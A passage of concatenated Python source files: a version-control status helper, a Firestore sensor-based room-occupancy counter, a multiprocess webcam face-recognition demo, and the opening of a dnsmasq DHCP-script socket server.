if cmds.is_empty():
return bool(cmds.locate_binary(binary, ignore_alias=True))
else:
return bool(cmds.lazy_locate_binary(binary, ignore_alias=True))
def current_branch():
"""Gets the branch for a current working directory. Returns an empty string
if the cwd is not a repository. This currently only works for git and hg
and should be extended in the future. If a timeout occurred, the string
'<branch-timeout>' is returned.
"""
branch = None
if _vc_has("git"):
branch = get_git_branch()
if not branch and _vc_has("hg"):
branch = get_hg_branch()
if isinstance(branch, subprocess.TimeoutExpired):
branch = "<branch-timeout>"
_first_branch_timeout_message()
return branch or None
def _get_exit_code(cmd):
""" Run a command and return its exit code """
denv = builtins.__xonsh__.env.detype()
child = subprocess.run(cmd, stderr=subprocess.DEVNULL, env=denv)
return child.returncode
def _git_dirty_working_directory(q, include_untracked):
try:
# Borrowed from this conversation
# https://gist.github.com/sindresorhus/3898739
if include_untracked:
cmd = [
"git",
"status",
"--porcelain",
"--quiet",
"--untracked-files=normal",
]
exitcode = _get_exit_code(cmd)
else:
# checking unindexed files is faster, so try that first
unindexed = ["git", "diff-files", "--quiet"]
exitcode = _get_exit_code(unindexed)
if exitcode == 0:
# then, check indexed files
indexed = ["git", "diff-index", "--quiet", "--cached", "HEAD"]
exitcode = _get_exit_code(indexed)
# "--quiet" git commands imply "--exit-code", which returns:
# 1 if there are differences
# 0 if there are no differences
dwd = bool(exitcode)
except (subprocess.CalledProcessError, OSError, FileNotFoundError):
q.put(None)
else:
q.put(dwd)
def git_dirty_working_directory(include_untracked=False):
"""Returns whether or not the git directory is dirty. If this could not
be determined (timeout, file not found, etc.) then this returns None.
"""
timeout = builtins.__xonsh__.env.get("VC_BRANCH_TIMEOUT")
q = queue.Queue()
t = threading.Thread(
target=_git_dirty_working_directory, args=(q, include_untracked)
)
t.start()
t.join(timeout=timeout)
try:
return q.get_nowait()
except queue.Empty:
return None
def hg_dirty_working_directory():
"""Computes whether or not the mercurial working directory is dirty or not.
If this cannot be determined, None is returned.
"""
env = builtins.__xonsh__.env
cwd = env["PWD"]
denv = env.detype()
vcbt = env["VC_BRANCH_TIMEOUT"]
# Override user configurations settings and aliases
denv["HGRCPATH"] = ""
try:
s = subprocess.check_output(
["hg", "identify", "--id"],
stderr=subprocess.PIPE,
cwd=cwd,
timeout=vcbt,
universal_newlines=True,
env=denv,
)
return s.strip(os.linesep).endswith("+")
except (
subprocess.CalledProcessError,
subprocess.TimeoutExpired,
FileNotFoundError,
):
return None
def dirty_working_directory():
"""Returns a boolean as to whether there are uncommitted files in version
control repository we are inside. If this cannot be determined, returns
None. Currently supports git and hg.
"""
dwd = None
if _vc_has("git"):
dwd = git_dirty_working_directory()
if dwd is None and _vc_has("hg"):
dwd = hg_dirty_working_directory()
return dwd
def branch_color():
"""Return red if the current branch is dirty, yellow if the dirtiness can
not be determined, and green if it is clean. These are bold, intense colors
for the foreground.
"""
dwd = dirty_working_directory()
if dwd is None:
color = "{BOLD_INTENSE_YELLOW}"
elif dwd:
color = "{BOLD_INTENSE_RED}"
else:
color = "{BOLD_INTENSE_GREEN}"
return color
def branch_bg_color():
"""Return red if the current branch is dirty, yellow if the dirtiness can
not be determined, and green if it is clean. These are background colors.
"""
dwd = dirty_working_directory()
if dwd is None:
color = "{BACKGROUND_YELLOW}"
elif dwd:
color = "{BACKGROUND_RED}"
else:
color = "{BACKGROUND_GREEN}"
return color
|
test.py
|
import firebase_admin
import datetime
from firebase_admin import credentials
from firebase_admin import firestore
from google.cloud.firestore_v1beta1 import ArrayUnion
import threading
import time
cred = credentials.Certificate("firebase_key.json")
firebase_admin = firebase_admin.initialize_app(cred)
db = firestore.client()
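# Editor's note: the Firestore layout assumed by the code below, inferred from
# the reads/writes in this script (not authoritative):
#   PIR_IN/<YYYYMMDD>, PIR_OUT/<YYYYMMDD>   -> {"HHMMSS": 1, ...} one field per entry/exit event
#   D1/<YYYYMMDD>, D2/<YYYYMMDD>            -> {"HHMMSS": <sensor reading>, ...}
#   PROCESSED_IN/<YYYYMMDD>, PROCESSED_OUT/<YYYYMMDD>
#       -> {"TOTALTODAY": n, "HOURLY": {"HH00": n}, "QUARTERLY": {"HHMM": n}}
#   AUX/AVERAGES                            -> {"Monday": avg, ..., "Sunday": avg}
#   AUX/TODAY                               -> occupancy aggregates for the current day
#   AUX/MOST_POPULAR_TIME_OF_TODAY          -> {"HHMMSS": occupancy}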
def get_fire_pir_in():
ref_pir_in = db.collection('PIR_IN')
docs_pir_in = ref_pir_in.get()
return docs_pir_in
def get_fire_pir_out():
ref_pir_out = db.collection('PIR_OUT')
docs_pir_out = ref_pir_out.get()
return docs_pir_out
def get_D1():
ref_d1 = db.collection('D1')
docs_d1 = ref_d1.get()
return docs_d1
def get_D2():
ref_d2 = db.collection('D2')
docs_d2 = ref_d2.get()
return docs_d2
def get_averages():
average_doc = db.collection('AUX').document('AVERAGES').get()
return average_doc.to_dict()
def get_most_popular_time_of_today():
popular_time = db.collection('AUX').document('MOST_POPULAR_TIME_OF_TODAY').get()
return popular_time.to_dict()
#Get people that went into the room throughout the whole day
def get_number_of_people_in_today():
date_now = datetime.datetime.now()
sum = 0
docs_pir_in = get_fire_pir_in()
for doc in docs_pir_in:
if (doc.id == date_now.strftime("%Y%m%d")):
for key,value in doc.to_dict().items():
sum += int(value)
return sum
#Get people that went out of the room throughout the whole day
def get_number_of_people_out_today():
date_now = datetime.datetime.now()
sum = 0
docs_pir_out = get_fire_pir_out()
for doc in docs_pir_out:
if(doc.id == date_now.strftime("%Y%m%d")):
for key,value in doc.to_dict().items():
sum += int(value)
return sum
#Gets people that went in at the current hour
def get_number_of_people_in_current_hour():
date_now = datetime.datetime.now()
sum = 0
time_now = date_now.strftime("%H%M%S")
docs_pir_in = get_fire_pir_in()
for doc in docs_pir_in:
if (doc.id == date_now.strftime("%Y%m%d")):
for key,value in doc.to_dict().items():
if (key[:2] == time_now[:2]):
sum += int(value)
return sum
#Update TOTALTODAY for the day today
def update_people_total_in_today():
date_now = datetime.datetime.now()
people_in_today = get_number_of_people_in_today()
print("In the function, number of people is : {}".format(people_in_today))
data = {"TOTALTODAY" : people_in_today}
db.collection('PROCESSED_IN').document(date_now.strftime("%Y%m%d")).set(data, merge=True)
def update_pir_things():
distance1_map = get_D1()
distance2_map = get_D2()
for distance1 in distance1_map:
distance2_map = get_D2()
for distance2 in distance2_map:
if (distance1.id == distance2.id): #Same date
dist_date = distance1.id
print("In same date, {}".format(dist_date))
distance1_dict = distance1.to_dict()
for key1, value1 in list(distance1_dict.items()):
time1 = key1
print("Looping inside list 1")
print("Time 1 is : {}".format(time1))
distance2_dict = distance2.to_dict()
for key2,value2 in list(distance2_dict.items()):
print("Looping inside list 2")
time2 = key2
print("Time 2 is : {}".format(time2))
gap = int(time1) - int(time2)
print("gap is {}".format(gap))
if (gap <= 200000 and gap >= 0): # D2 triggered before D1 within the allowed window -> count as an entry (times are HHMMSS-encoded integers)
date_now = datetime.datetime.now()
doc_name = date_now.strftime("%Y%m%d")
time = date_now.strftime("%H%M%S")
data = {time : 1}
db.collection('PIR_IN').document(doc_name).set(data, merge=True)
db.collection('D1').document(dist_date).update({key1 : firestore.DELETE_FIELD})
db.collection('D2').document(dist_date).update({key2 : firestore.DELETE_FIELD})
try:
distance1_dict.pop(time1)
distance2_dict.pop(time2)
except:
print("Caught")
break
elif (gap >= -200000 and gap <= 0): # D1 triggered before D2 within the allowed window -> count as an exit
print("Met second cond")
date_now = datetime.datetime.now()
doc_name = date_now.strftime("%Y%m%d")
time = date_now.strftime("%H%M%S")
data = {time : 1}
db.collection('PIR_OUT').document(doc_name).set(data, merge=True)
db.collection('D1').document(dist_date).update({key1 : firestore.DELETE_FIELD})
db.collection('D2').document(dist_date).update({key2 : firestore.DELETE_FIELD})
try:
distance1_dict.pop(time1)
distance2_dict.pop(time2)
except:
print("Caught")
break
#Update the Hourly field of today
def update_people_total_in_current_hour():
date_now = datetime.datetime.now()
people_in_current_hour = get_number_of_people_in_current_hour()
data = {"HOURLY" : {(date_now.strftime("%H") + "00") : people_in_current_hour}}
db.collection('PROCESSED_IN').document(date_now.strftime("%Y%m%d")).set(data, merge=True)
def update_people_quarter_in_current_hour():
date_now = datetime.datetime.now()
people_in_current_hour = get_number_of_people_in_current_hour()
data = {"QUARTERLY" : {date_now.strftime("%H%M") : people_in_current_hour }}
db.collection('PROCESSED_IN').document(date_now.strftime("%Y%m%d")).set(data, merge=True)
print("In the function, number of people IN quarter is {}".format(people_in_current_hour))
#Gets people that went in at the current hour
def get_number_of_people_out_current_hour():
date_now = datetime.datetime.now()
sum = 0
time_now = date_now.strftime("%H%M%S")
docs_pir_out = get_fire_pir_out()
for doc in docs_pir_out:
if (doc.id == date_now.strftime("%Y%m%d")):
for key,value in doc.to_dict().items():
if (key[:2] == time_now[:2]):
sum += int(value)
return sum
def update_time_averages():
date_now = datetime.datetime.now()
people_in = db.collection('PROCESSED_IN').document(date_now.strftime("%Y%m%d")).get()
sum_in = 0
people_out = db.collection('PROCESSED_OUT').document(date_now.strftime("%Y%m%d")).get()
for items in people_in.to_dict().items():
print("ITEM : {}".format(items))
if (items[0] == "QUARTERLY"):
print("ITEMS 11 : {}".format(items[1]))
for key, value in items[1].items():
print("VAL : {}, {}".format(key, value))
if (key[:2] == date_now.strftime("%H")):
print("Updating current average for current time")
sum_in += int(value)
sum_out = 0
for items in people_out.to_dict().items():
if (items[0] == "QUARTERLY"):
print("IEMS 1 : {}".format(items[1]))
for key, value in items[1].items():
print("HASAKEY : {}".format(value))
if (key[:2] == date_now.strftime("%H")):
sum_out += int(value)
print("SUM IN {}".format(sum_in))
print("SUM OUT {}".format(sum_out))
sum = sum_in - sum_out
if (sum < 0):
sum = 0
print("Sum is {}".format(sum))
data = {(date_now.strftime("%H:") + "00") : sum}
db.collection('AUX').document('TODAY').set(data, merge=True)
#Update TOTALTODAY for the day today
def update_people_total_out_today():
date_now = datetime.datetime.now()
people_out_today = get_number_of_people_out_today()
data = {"TOTALTODAY" : people_out_today}
db.collection('PROCESSED_OUT').document(date_now.strftime("%Y%m%d")).set(data, merge=True)
#Update the Hourly field of today
def update_people_total_out_current_hour():
date_now = datetime.datetime.now()
people_out_current_hour = get_number_of_people_out_current_hour()
data = {"HOURLY" : {(date_now.strftime("%H") + "00") : people_out_current_hour}}
db.collection('PROCESSED_OUT').document(date_now.strftime("%Y%m%d")).set(data, merge=True)
#Update the quarter of people, only call this function every 15 minutes
def update_people_quarter_out_current_hour():
date_now = datetime.datetime.now()
people_out_current_hour = get_number_of_people_out_current_hour()
data = {"QUARTERLY" : {date_now.strftime("%H%M") : people_out_current_hour }}
db.collection('PROCESSED_OUT').document(date_now.strftime("%Y%m%d")).set(data, merge=True)
def get_current_occupancy():
current_people = (get_number_of_people_in_today()) - (get_number_of_people_out_today())
return current_people
def update_todays_averages():
day_today = datetime.datetime.now().strftime("%A")
print("Today is {}".format(day_today))
averages = get_averages()
average_in_db = averages[day_today]
new_average = (int(average_in_db) + int(get_number_of_people_in_today()))/2
data = {day_today : new_average}
db.collection('AUX').document('AVERAGES').update(data)
def update_current_occupancy():
current_occupancy = get_current_occupancy()
data = {'CURRENT_OCCUPANCY' : current_occupancy}
db.collection('AUX').document('TODAY').update(data)
def update_most_popular_time():
current_occupancy = get_current_occupancy()
most_popular_time = get_most_popular_time_of_today()
if (current_occupancy > int(list(most_popular_time.values())[0])):
time_now = datetime.datetime.now().strftime("%H%M%S")
data = {time_now : current_occupancy}
db.collection('AUX').document('MOST_POPULAR_TIME_OF_TODAY').set(data, merge=True)
def update_people_in_today():
people_today = get_number_of_people_in_today()
data = {'NUMBER_OF_PEOPLE_IN_TODAY' : people_today}
db.collection('AUX').document('TODAY').update(data)
def update_people_out_today():
people_today = get_number_of_people_out_today()
data = {'NUMBER_OF_PEOPLE_OUT_TODAY' : people_today}
db.collection('AUX').document('TODAY').update(data)
quarterly_time_list = ['00','15','30','45']
def update_every_1_mins():
while True:
print('Running the minute thread......')
date_now_minute = datetime.datetime.now().strftime("%M")
update_pir_things()
if (date_now_minute in quarterly_time_list):
print("Updating the value in db")
update_people_quarter_in_current_hour()
update_people_quarter_out_current_hour()
update_todays_averages()
update_current_occupancy()
update_people_in_today()
update_people_out_today()
update_most_popular_time()
time.sleep(60*2)
quarterly_thread = threading.Thread(target=update_every_1_mins, args=[]) # Try to do the quarterly updates in a separate thread
#secondly_thread = threading.Thread(target=update_every_10_seconds, args=[])
#secondly_thread.start()
quarterly_thread.start()
while True:
print('Running main loop......')
update_people_total_in_today()
update_people_total_in_current_hour()
update_people_total_out_today()
update_people_total_out_current_hour()
update_time_averages()
time.sleep(60*15)
|
facerec_from_webcam_mult_thread.py
|
#!/usr/bin/python3.6
# -*- coding: utf-8 -*-
# @author breeze
import threading
import argparse
import multiprocessing
import time
from multiprocessing import Queue, Pool
import face_recognition
import pandas as pd
import win32com.client
import cv2
import encoding_images
from app_utils import *
# This is a demo of running face recognition on live video from your webcam. It's a little more complicated than the
# other example, but it includes some basic performance tweaks to make things run a lot faster:
# 1. Process each video frame at 1/4 resolution (though still display it at full resolution)
# 2. Only detect faces in every other frame of video.
# PLEASE NOTE: This example requires OpenCV (the `cv2` library) to be installed only to read from your webcam.
# OpenCV is *not* required to use the face_recognition library. It's only required if you want to run this
# specific demo. If you have trouble installing it, try any of the other demos that don't require it instead.
# Load a sample picture and learn how to recognize it.
# face_recognition.api.batch_face_locations(images, number_of_times_to_upsample=1, batch_size=128)[source]
# face_recognition.api.compare_faces(known_face_encodings, face_encoding_to_check, tolerance=0.6)
# face_recognition.api.face_distance(face_encodings, face_to_compare)[source]
# face_recognition.api.face_encodings(face_image, known_face_locations=None, num_jitters=1)[source]
# face_recognition.api.face_landmarks(face_image, face_locations=None)[source]
# face_recognition.api.face_locations(img, number_of_times_to_upsample=1, model='hog')[source]
# face_recognition.api.load_image_file(file, mode='RGB')[source]
# Speech module (voice output)
speaker = win32com.client.Dispatch("SAPI.SpVoice")
name = "Unknown"
current_names = [name]
last_time = time.time()
known_face_names = []
known_face_encodings = []
known_face_encodings, known_face_names = encoding_images.load_encodings()
# Initialize some variables
face_locations = []
face_encodings = []
face_names = []
process_this_frame = True
TIME_DIFF = 20 # persistence interval in seconds; when set to 0, every recognition result is saved immediately
name_record = "./dataset/face_record.txt" # file used to persist the recognized face results
NAME_DF = pd.DataFrame(known_face_names, columns=["name"])
last_ts = time.time()
lock = threading.Lock()
def myprint(log, ts):
global lock, last_ts
if lock.acquire():
diff = ts - last_ts
print(log, '--------', diff)
last_ts = ts
lock.release()
def process_face_records(name):
"""
Handle each recognition record and persist the data to a file after a
certain amount of time.
Global concurrent access happens here, which can lead to locking issues.
:param name:
:return:
"""
return # NOTE: this early return disables the record-keeping code below
print('process_face_records start', time.time())
global current_names, last_time
# myprint("global current_names {}, last_time {}".format(current_names, last_time))
# If the name is not in the recognized list yet, greet the person
if name not in current_names:
print("ts ====", last_time, time.time())
current_names.append(name)
myprint("Hello {}, nice to meet you! ".format(name))
# speaker.Speak("Hello {}, nice to meet you! ".format(name))
# After a certain period, clear the list of already recognized people
if last_time < time.time() - TIME_DIFF: # periodically clear the detected people
last_time = time.time()
time_format = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
myprint(time_format + " update last_time and clear current_names.")
with open(name_record, 'a') as f:
if len(current_names) > 0:
f.writelines("{}:{} \n".format(time_format, str(current_names)))
print("======", current_names)
current_names = [] # clear()
current_names = [name]
myprint('process_face_records end', time.time())
def vote_class(face_encoding, tolerance=0.3, topN=5):
myprint('vote start ', time.time())
"""
When several comparison results fall below the tolerance, the top N of them
vote to decide the final class; the distances are not weighted here.
:param face_encoding: face encoding
:param tolerance: distance threshold; smaller means more similar
:param topN: maximum number of candidates taking part in the vote
:return: detected name
"""
# Compute the distances to all known face encodings
distance_ = face_recognition.face_distance(known_face_encodings, face_encoding)
df = pd.DataFrame(distance_, columns=["dis"]) # convert to a DataFrame
topDF = df[df['dis'] <= tolerance].nsmallest(topN, columns=['dis']) # filter the result set
namedf = NAME_DF.loc[topDF.index] # look up the face names matching these distances
con = pd.concat([topDF, namedf], axis=1) # concat name and distance
# print('con', con)
group = con.groupby(["name"])['dis'].sum()
gp = group.reset_index()
print('vote -- ', gp)
if len(gp) == 0:
print("------unknown -----")
return "Unknown", 10
import numpy as np # TODO optimize
arr = np.array(gp)
name1 = arr[0, 0]
dis1 = arr[0, 1]
print("get top one:", name1, dis1)
myprint('vote end', time.time())
return name1, dis1
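# Editor's note: a toy walk-through of the voting step above (illustrative numbers).
# Suppose the distances within tolerance and their matched names are:
#     dis    name
#     0.22   alice
#     0.25   alice
#     0.28   bob
# groupby(["name"])['dis'].sum() then yields {alice: 0.47, bob: 0.28}; after
# reset_index() the rows are ordered by name, and the code returns the first row
# ("alice", 0.47), i.e. the alphabetically first candidate class rather than the
# one with the smallest summed distance.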
def face_process(frame):
# Resize frame of video to 1/4 size for faster face recognition processing
myprint("face process resize start", time.time())
small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
# Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)
myprint("face process small_frame start", time.time())
rgb_small_frame = small_frame[:, :, ::-1]
# Find all the faces and face encodings in the current frame of video
# face_locations = face_recognition.face_locations(rgb_small_frame, model="cnn")
myprint('face_locations start', time.time())
face_locations = face_recognition.face_locations(rgb_small_frame, model="hog")
myprint('face_locations end', time.time())
myprint('face_encodings start', time.time())
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
myprint('face_encodings end', time.time())
face_names = []
for face_encoding in face_encodings:
# optimize start: KNN-style voting - accumulate the top-N candidates per class, then take the top 1
name, dis = vote_class(face_encoding)
# optimize end
face_names.append(name) # store the recognized name
# Display the results
for (top, right, bottom, left), name in zip(face_locations, face_names):
# Scale back up face locations since the frame we detected in was scaled to 1/4 size
top *= 4
right *= 4
bottom *= 4
left *= 4
myprint('putText start', time.time())
# Draw a box around the face
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
# Draw a label with a name below the face
cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
myprint("putText end " + name, time.time())
# say hello and save record to file
myprint('process_face_records start', time.time())
process_face_records(name)
myprint('process_face_records end', time.time())
# Display the resulting image
# cv2.imshow('Video', frame)
myprint("face process end", time.time())
return frame
def worker(input_q, output_q):
# Load a (frozen) Tensorflow model into memory.
fps = FPS().start()
while True:
myprint("updata start ", time.time())
fps.update()
myprint("updata end ", time.time())
# global lock
# if lock.acquire():
# lock.release()
frame = input_q.get()
myprint("out queue {} and input que size {} after input_q get".format(output_q.qsize(), input_q.qsize()), time.time())
myprint("out queue {} and input que size {} after lock release ".format(output_q.qsize(), input_q.qsize()), time.time())
myprint("face process start", time.time())
# frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
out_frame = face_process(frame)
myprint("out queue {} and input que size {}".format(output_q.qsize(), input_q.qsize()), time.time())
output_q.put(out_frame)
myprint("out queue {} and input que size {} ".format(output_q.qsize(), input_q.qsize()), time.time())
fps.stop()
if __name__ == '__main__':
width = 640
height = 480
num_workers = 3
queue_size = 5
parser = argparse.ArgumentParser()
parser.add_argument('-src', '--source', dest='video_source', type=int,
default=0, help='Device index of the camera.')
parser.add_argument('-wd', '--width', dest='width', type=int,
default=width, help='Width of the frames in the video stream.')
parser.add_argument('-ht', '--height', dest='height', type=int,
default=height, help='Height of the frames in the video stream.')
parser.add_argument('-num-w', '--num-workers', dest='num_workers', type=int,
default=num_workers, help='Number of workers.')
parser.add_argument('-q-size', '--queue-size', dest='queue_size', type=int,
default=queue_size, help='Size of the queue.')
args = parser.parse_args()
logger = multiprocessing.log_to_stderr()
logger.setLevel(multiprocessing.SUBDEBUG)
input_q = Queue(maxsize=args.queue_size)
output_q = Queue(maxsize=args.queue_size)
pool = Pool(args.num_workers, worker, (input_q, output_q))
# Get a reference to webcam #0 (the default one)
# video_capture = cv2.VideoCapture(0)
video_capture = WebcamVideoStream(src=args.video_source,
width=args.width,
height=args.height).start()
fps = FPS().start()
# while video_capture.isOpened():
while True:
# Grab a single frame of video
# ret, frame = video_capture.read()
myprint("out queue {} and input que size {} video_capture start ".format(output_q.qsize(), input_q.qsize()), time.time())
frame = video_capture.read()
myprint("out queue {} and input que size {} ".format(output_q.qsize(), input_q.qsize()), time.time())
input_q.put(frame)
myprint("out queue {} and input que size {} ".format(output_q.qsize(), input_q.qsize()), time.time())
# Only process every other frame of video to save time
if process_this_frame:
# COLOR_RGB2BGR
myprint("out queue {} and input que size {} ".format(output_q.qsize(), input_q.qsize()), time.time())
cv2.imshow("aa", output_q.get())
myprint("out queue {} and input que size {} after imshow ".format(output_q.qsize(), input_q.qsize()),
time.time())
# cv2.imshow("aa", frame)
fps.update()
# face_process(rgb_small_frame)
# output_rgb = cv2.cvtColor(output_q.get(), cv2.COLOR_RGB2BGR)
# t = threading.Thread(target=face_process, name='face_process') # thread object
# t.start() # start the thread
# process_this_frame = not process_this_frame
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
fps.stop()
pool.terminate()
# Release handle to the webcam
video_capture.release()
cv2.destroyAllWindows()
|
server.py
|
import array
import contextlib
import ctypes
import fcntl
import io
import logging
import mmap
import os
import signal
import socket
import socketserver
import struct
import sys
import threading
from collections.abc import Container
from itertools import chain, repeat
from typing import Dict, Generator, List, Optional, Sequence, Tuple, TypeVar, TextIO
from hades.bin.dhcp_script import Context, create_parser, dispatch_commands
from hades.common.signals import install_handler
logger = logging.getLogger(__name__)
SIZEOF_INT = ctypes.sizeof(ctypes.c_int)
memfd_create = ctypes.cdll.LoadLibrary("libc.so.6").memfd_create
MFD_CLOEXEC = 1
T = TypeVar('T')
Parser = Generator[int, Tuple[mmap.mmap, int], T]
class BaseParseError(Exception):
def __init__(
self,
*args,
element: Optional[str] = None,
offset: Optional[int] = None,
) -> None:
self.element = element
self.offset = offset
super().__init__(*args, element, offset)
def _prefix(self) -> str:
offset, element = self.offset, self.element
return "".join([
"" if offset is None else "at offset {}: ".format(offset),
"" if element is None else "while parsing {}: ".format(element),
]).capitalize()
def with_element(self, element: str):
self.element = element
return self
def with_offset(self, offset: int):
self.offset = offset
return self
class ParseError(BaseParseError):
def __init__(
self,
message: str,
*,
element: Optional[str] = None,
offset: Optional[int] = None,
) -> None:
self.element = element
self.offset = offset
self.message = message
super().__init__(message, element=element, offset=offset)
def __str__(self) -> str:
return self._prefix() + self.message
class UnexpectedEOFError(BaseParseError):
def __init__(
self,
needed: int,
available: int,
*,
element: Optional[str] = None,
offset: Optional[int] = None,
) -> None:
self.needed = needed
self.available = available
super().__init__(
needed,
available,
element=element,
offset=offset,
)
def __str__(self) -> str:
return (
"{}Unexpected end of file, expected at least {} more byte(s), "
"but only {} byte(s) left."
.format(self._prefix(), self.needed, self.available)
)
class BufferTooSmallError(BaseParseError):
def __init__(
self,
needed: int,
available: int,
*,
element: Optional[str] = None,
offset: Optional[int] = None,
) -> None:
self.needed = needed
self.available = available
super().__init__(
needed,
available,
element=element,
offset=offset,
)
def __str__(self) -> str:
return (
"{}Parser requires more data ({}) than can be buffered ({})."
.format(self._prefix(), self.needed, self.available)
)
class ProtocolError(Exception):
pass
class Server(socketserver.UnixStreamServer):
"""
Process :program:`dnsmasq` :option:`--dhcp-script` invocations.
:program:`dnsmasq` can notify external tools about DHCP lease activity and
even maintain a completely external lease database, if additionally
:option:`--leasefile-ro` is specified. We use this mechanism to store the
leases in the database.
Starting a Python script that connects to a PostgreSQL database for DHCP
lease activity of dnsmasq is too slow however:
* The Python interpreter has some startup latency, but more importantly
setuptools console scripts have a very long startup time (>1s) due to
`this issue <https://github.com/pypa/setuptools/issues/510>`_.
* PostgreSQL forks for every connection.
To alleviate these issues we use a small and quick C client that passes its
command-line arguments, environment variables and file descriptors over a
UNIX socket to a long running Python server application that's permanently
connected to the database. The server is single threaded and will only
handle a single request at a time, because :program:`dnsmasq` itself is
single threaded.
The protocol is as follows:
* We use a SOCK_STREAM AF_UNIX socket, so that the client knows on the
socket level, when server has received all data and finished handling the
request.
* At first the client sends all data to server. The data may not exceed
:py:code:`mmap.PAGESIZE - 1`. The content of the data is as follows:
1. The first bytes are the number of arguments (:c:data:`argc`) as
native type :c:type:`int`.
2. This is followed by the contents of :c:data:`argv` as a series of
zero terminated strings.
3. After that the number of environment variables, that start with the
prefix :envvar:`DNSMASQ_*` as native type :c:type:`int`.
4. Followed by the actual environment variables as a series of zero
terminated strings.
* The three standard file descriptors stdin, stdout, and stderr of the
script should be passed with data at some point in time via a
:c:data:`SCM_RIGHTS` control message.
* After all data has been sent, the client shuts down its write end of the
connection and signals the server thereby, that it can begin processing
the message.
* The server will process the message and if necessary read additional data
from the passed stdin file descriptor and write data to the passed stdout
and stderr file descriptors.
* After it has processed the message, the server sends a single byte status
code between 0 and 127 and will close the connection. The script will
exit with the status code.
"""
max_packet_size = mmap.PAGESIZE - 1
def __init__(self, sock, engine):
self.parser = create_parser(standalone=False)
self.engine = engine
server_address = sock.getsockname()
super().__init__(
server_address, self._request_handler, bind_and_activate=False,
)
self.socket = sock
# Leave one byte extra for trailing zero byte
# TODO: With Python 3.8 a memfd can be opened and mapped twice:
# writable and readonly
fd = memfd_create(b"buffer", MFD_CLOEXEC)
os.ftruncate(fd, self.max_packet_size + 1)
self.buffer = mmap.mmap(
fd,
self.max_packet_size + 1,
mmap.MAP_PRIVATE,
mmap.PROT_READ | mmap.PROT_WRITE,
)
def _request_handler(
self,
request: socket.socket,
client_address,
server: socketserver.BaseServer,
):
assert self == server
logger.debug("Received new request from %s", client_address)
(stdin, stdout, stderr), args, env = self._receive(request)
status = os.EX_SOFTWARE
try:
status = self._process(stdin, stdout, stderr, args, env)
finally:
stdout.flush()
stderr.flush()
request.send(status.to_bytes(1, sys.byteorder))
def _receive(
self,
request: socket.socket,
) -> Tuple[Tuple[TextIO, TextIO, TextIO], List[bytes], Dict[bytes, bytes]]:
streams: List[TextIO] = []
# Offset of the buffer relative to the input stream
offset = 0
# Number of filled bytes in the buffer
available = 0
# Initialize parser
buffer = self.buffer
buffer.seek(0, os.SEEK_SET)
parser = self.parse_request(buffer, 0)
needed = next(parser)
with contextlib.ExitStack() as stack:
while needed:
# Prepare buffer for refill
parsed = buffer.tell()
offset += parsed
buffer.move(0, parsed, available - parsed)
buffer.seek(0, os.SEEK_SET)
available -= parsed
if needed > self.max_packet_size:
parser.throw(BufferTooSmallError(
needed,
self.max_packet_size,
offset=offset,
))
# Leave space for a trailing zero byte
size, ancdata, msg_flags, _ = request.recvmsg_into(
(memoryview(buffer)[available:-1],),
socket.CMSG_LEN(3 * SIZEOF_INT),
socket.MSG_CMSG_CLOEXEC,
)
available += size
# Ensure that a trailing zero byte exists
buffer[available] = 0
streams.extend(
stack.enter_context(stream)
for stream in self.parse_ancillary_data(ancdata, ["r", "w", "w"])
)
if msg_flags & socket.MSG_CTRUNC:
raise ProtocolError("Truncated ancillary data")
try:
needed = parser.send((buffer, available))
except StopIteration as e:
_, _, (argv, environ) = e.value
if buffer.tell() < available:
raise ProtocolError(
"{} byte(s) left over after parsing"
.format(available - buffer.tell())
)
needed = 0
except BaseParseError as e:
raise e.with_offset(offset + buffer.tell())
else:
# Remote end closed/shut down writing
if needed > 0 and size == 0:
# Raise an error in the parser to produce an error with
# proper message
parser.throw(UnexpectedEOFError(
needed,
available,
offset=offset + buffer.tell(),
))
if not streams:
raise ProtocolError("No file descriptors received")
if len(streams) != 3:
raise ProtocolError(
"Expected to receive exactly 3 file descriptors"
)
stdin = ensure_stream_readable(streams[0], 'stdin')
stdout = ensure_stream_writable(streams[1], 'stdout')
stderr = ensure_stream_writable(streams[2], 'stderr')
# Clear the stack
stack.pop_all()
return (stdin, stdout, stderr), argv, environ
@staticmethod
def parse_ancillary_data(
ancdata: Container[Tuple[int, int, bytes]],
expected_fd_modes: Sequence[str],
) -> List[TextIO]:
"""
Open streams for file descriptors received via :func:`socket.recvmsg`
ancillary data.
:param ancdata:
:param expected_fd_modes: a sequence of modes in which the fds should be opened
:return:
"""
fds = array.array("i")
streams = []
with contextlib.ExitStack() as stack:
truncated = False
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if (
cmsg_level == socket.SOL_SOCKET
and cmsg_type == socket.SCM_RIGHTS
):
end = len(cmsg_data) - (len(cmsg_data) % fds.itemsize)
truncated |= end != len(cmsg_data)
fds.frombytes(cmsg_data[:end])
else:
logger.warning(
"Received unexpected control message: level=%d type=%d",
cmsg_level, cmsg_type,
)
# Ensure that file descriptors get closed on error
for fd in fds:
stack.callback(_try_close, fd)
if truncated:
raise ProtocolError(
"Received truncated file descriptor. "
"SCM_RIGHTS control message data must be an multiple of "
"sizeof(int) = {}".format(fds.itemsize)
)
for fd, fd_mode in zip_left(fds, expected_fd_modes):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
if flags & os.O_ACCMODE == os.O_RDONLY:
mode = "r"
elif flags & os.O_ACCMODE == os.O_WRONLY:
mode = "w"
elif flags & os.O_ACCMODE == os.O_RDWR:
# the stdout/stderr buffers can possibly be in RW mode,
# however the buffer used by `sys.stdout` is usually opened in
# write-only mode by python.
# in fact, opening this in `r+` (i.e. read-write mode) and using buffering
# causes open() to refuse operation because the buffer is not seekable.
# See https://bugs.python.org/issue20074#msg207012 and the related discussion
# for some details on the core developers' philosophy on this.
mode = fd_mode or "w"
else:
os.close(fd)
logger.warning("Unknown fd ACCMODE %x for fd %d", flags & os.O_ACCMODE, fd)
continue
# noinspection PyTypeChecker
try:
